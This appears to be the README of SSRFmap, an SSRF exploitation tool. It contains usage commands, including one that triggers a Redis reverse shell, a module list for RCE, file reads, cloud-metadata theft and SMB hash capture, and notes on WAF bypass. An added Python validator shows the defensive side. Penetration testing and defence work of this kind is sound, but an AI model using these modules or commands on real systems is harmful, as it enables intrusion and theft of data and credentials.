SSRFmap - Automatic SSRF Fuzzer and Exploitation Tool
Server Side Request Forgery (SSRF) is a vulnerability in which an attacker forces a server to perform requests on their behalf.
SSRF is frequently used to reach and act on other services; this framework aims to discover and exploit those services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.
Guide / RTFM
Basic install from the Github repository.
```
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py

usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lport LPORT] [--level LEVEL]

optional arguments:
  -h, --help       show this help message and exit
  -r REQFILE       SSRF Request file
  -p PARAM         SSRF Parameter to target
  -m MODULES       SSRF Modules to enable
  -l HANDLER       Start a handler for a reverse shell
  --lhost LHOST    LHOST reverse shell
  --lport LPORT    LPORT reverse shell
  --level [LEVEL]  Level of test to perform (1-5, default: 1)
```
```
# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Trigger a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l creates a listener for the reverse shell on the specified port
# --lhost and --lport work like in Metasploit; these values are used to create a reverse shell payload
# --level: tweaks the payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...
```
A quick way to test the framework is the `data/example.py` SSRF service:

```
FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles
```
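The `data/example.py` test service is an intentionally vulnerable SSRF target. For the defensive side, the following is an added example, not code from SSRFmap, of a hypothetical outbound-URL validator (`check_outbound_url`, `is_public_address` and `resolve_host` are assumed names) that a service like it would need before fetching a user-supplied URL. It resolves the host and classifies the resulting addresses instead of string-matching, so the alternate loopback spellings the `--level` option cycles through (`[::]`, IPv4-mapped IPv6) are caught by the same rule, and it rejects non-HTTP schemes outright.

```python
# Added example, not part of SSRFmap: a hypothetical outbound-URL validator
# of the kind the data/example.py service lacks. It rejects non-HTTP schemes
# and any host that resolves to a non-public address. Alternate spellings of
# loopback such as [::] or ::ffff:127.0.0.1 are handled by resolving and
# classifying the address rather than matching the string "127.0.0.1".
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumption for this example: only plain web fetches are legitimate egress.
ALLOWED_SCHEMES = {"http", "https"}


def is_public_address(addr):
    """True only for a globally routable unicast address.

    IPv4-mapped IPv6 addresses (::ffff:a.b.c.d) are unwrapped first so that a
    loopback or private IPv4 address cannot hide inside an IPv6 literal.
    """
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    # is_global is False for loopback, RFC 1918, link-local (169.254.0.0/16,
    # where cloud metadata services live), unspecified (0.0.0.0, ::) and
    # reserved space; multicast is excluded explicitly.
    return addr.is_global and not addr.is_multicast


def resolve_host(host):
    """Resolve host to the list of addresses a client would connect to.

    Literal addresses come straight back from getaddrinfo without a DNS
    lookup, so the check works offline for them; an unresolvable name
    yields an empty list, which the caller treats as a rejection.
    """
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    addrs = []
    for _family, _type, _proto, _canon, sockaddr in infos:
        # Drop an IPv6 scope id ("fe80::1%eth0") before parsing.
        ip = ipaddress.ip_address(sockaddr[0].split("%")[0])
        if ip not in addrs:
            addrs.append(ip)
    return addrs


def check_outbound_url(url):
    """Return (allowed, reason, addresses).

    `addresses` is the list of resolved IPs the caller should connect to
    directly, instead of letting the HTTP client resolve the name a second
    time (which would reopen a DNS-rebinding window).
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed", []
    host = parts.hostname
    if not host:
        return False, "no host in URL", []
    addrs = resolve_host(host)
    if not addrs:
        return False, f"cannot resolve {host!r}", []
    for ip in addrs:
        if not is_public_address(ip):
            return False, f"{host!r} resolves to non-public address {ip}", addrs
    return True, "ok", addrs


if __name__ == "__main__":
    # Constructed sample inputs, including the loopback spellings the
    # README's --level description lists.
    for candidate in [
        "http://8.8.8.8/",
        "http://127.0.0.1/",
        "http://[::]/",
        "http://[::ffff:127.0.0.1]/",
        "http://169.254.169.254/latest/meta-data/",
        "gopher://8.8.8.8:70/",
    ]:
        allowed, reason, _ = check_outbound_url(candidate)
        print(f"{'ALLOW' if allowed else 'BLOCK':5} {candidate}  ({reason})")
```

Two caveats apply to any check of this shape: the fetch must connect to the addresses the validator returned rather than re-resolving the name, and every HTTP redirect has to be re-validated with the same function before it is followed, otherwise a public host can simply redirect the server to an internal one.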
Modules
The following modules are already implemented and can be used with the `-m` argument.

| Name | Description |
|---|---|
fastcgi | FastCGI RCE |
redis | Redis RCE |
github | Github Enterprise RCE < 2.8.7 |
zabbix | Zabbix RCE |
mysql | MySQL Command execution |
docker | Docker Infoleaks via API |
smtp | SMTP send mail |
portscan | Scan ports for the host |
networkscan | HTTP Ping sweep over the network |
readfiles | Read files such as /etc/passwd |
alibaba | Read files from the provider (e.g: meta-data, user-data) |
aws | Read files from the provider (e.g: meta-data, user-data) |
digitalocean | Read files from the provider (e.g: meta-data, user-data) |
socksproxy | SOCKS4 Proxy |
smbhash | Force an SMB authentication via a UNC Path |
Inspired by
- All you need to know about SSRF and how we may write tools to auto-detect it - Auxy
- How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai
- Blog on Gopherus Tool - SpyD3r
- Gopherus - Github
- SSRF testing - cujanovic